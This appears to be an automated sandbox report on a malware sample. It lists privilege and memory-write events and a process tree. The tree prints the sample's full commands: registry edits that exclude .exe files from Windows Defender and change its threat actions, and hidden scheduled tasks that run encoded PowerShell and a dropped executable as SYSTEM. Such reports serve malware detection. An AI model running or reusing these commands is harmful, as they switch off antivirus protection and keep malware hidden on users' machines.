N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe
PID 2128 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe
PID 2128 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe
PID 4212 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4212 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4212 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3100 wrote to memory of 4924 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4924 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4924 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 652 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 5012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 5012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 5012 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 652 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3872 wrote to memory of 928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 4212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4212 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2860 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3912 wrote to memory of 4384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3912 wrote to memory of 4384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3912 wrote to memory of 4384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 1720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 1720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 1720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 708 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 708 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 708 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 3640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3912 wrote to memory of 3640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe

"C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe

.\Install.exe /XodidE "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gEMytGLpP" /SC once /ST 07:52:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gEMytGLpP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gEMytGLpP"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe\" hl /Tnsite_idMfj 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe hl /Tnsite_idMfj 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

